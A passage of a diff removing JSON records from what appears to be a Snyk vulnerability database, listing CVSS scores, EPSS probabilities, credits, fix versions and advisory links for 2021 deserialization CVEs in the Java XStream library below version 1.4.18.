-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T07:43:43Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99286",
-          "probability": "0.84542"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "PoC in GitHub",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:03:39.618038Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:22.653112Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39141.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39141.yaml"
-          },
-          {
-            "title": "PoC in GitHub",
-            "url": "https://github.com/zwjjustdoit/Xstream-1.4.17"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T07:51:04.130182Z",
-        "credits": [
-          "Lai Han"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-07-08T16:06:33.130953Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.805793Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:54.921495Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:56.995671Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T07:49:36Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.73981",
-          "probability": "0.00842"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-07-08T16:06:33.130953Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:25.723467Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39139.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T07:55:15.088252Z",
-        "credits": [
-          "Smi1e"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:20.416887Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:56.830873Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.463896Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:58.805531Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T07:53:09Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.67772",
-          "probability": "0.00573"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:48.463896Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:25.48837Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39151.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T07:58:23.064814Z",
-        "credits": [
-          "Ceclin and YXXX"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:20.248372Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:51:50.603895Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:55.606621Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.206197Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T07:56:49Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.97899",
-          "probability": "0.54176"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:03:39.810969Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:25.253783Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39146.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:01:41.106128Z",
-        "credits": [
-          "wh1t3p1g"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:22.052886Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.810032Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:46.441358Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.350056Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:00:40Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.67772",
-          "probability": "0.00573"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:46.441358Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:25.013194Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39148.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:14:45.151211Z",
-        "credits": [
-          "wh1t3p1g"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:22.162024Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.81219Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:54.978741Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:58.747506Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:13:11Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.67772",
-          "probability": "0.00573"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:54.978741Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:24.762736Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39147.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:20:29.336468Z",
-        "credits": [
-          "Ceclin and YXXX"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:02:06.755154Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.430348Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.457423Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.11424Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H",
-        "disclosed_at": "2021-08-24T08:17:50Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99953",
-          "probability": "0.94353"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "high",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "attacked",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "CISA",
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-06T05:03:21.030555Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:24.537044Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39144.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          },
-          {
-            "title": "CISA - Known Exploited Vulnerabilities",
-            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:33:14.085093Z",
-        "credits": [
-          "ka1n4t"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:16.63116Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:44:28.161599Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:46.574146Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.268837Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:32:04Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.71504",
-          "probability": "0.00712"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:46.574146Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:24.314152Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39154.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:35:50.612195Z",
-        "credits": [
-          "Lai Han"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:22.805549Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.428032Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:47.63548Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.240881Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:34:18Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.71504",
-          "probability": "0.00712"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:47.63548Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:24.090306Z",
-        "references": [
-          {
-            "title": "GitHub Advisory",
-            "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39149.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:39:25.017804Z",
-        "credits": [
-          "Li4n0"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:19.574964Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:51:50.584098Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.474589Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.14981Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:38:02Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.65041",
-          "probability": "0.00500"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:48.474589Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:23.849157Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39145.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:42:23.26187Z",
-        "credits": [
-          "Lai Han"
-        ],
-        "cvss_base_score": 6.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:19.377431Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 6.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.803673Z",
-            "severity": "medium",
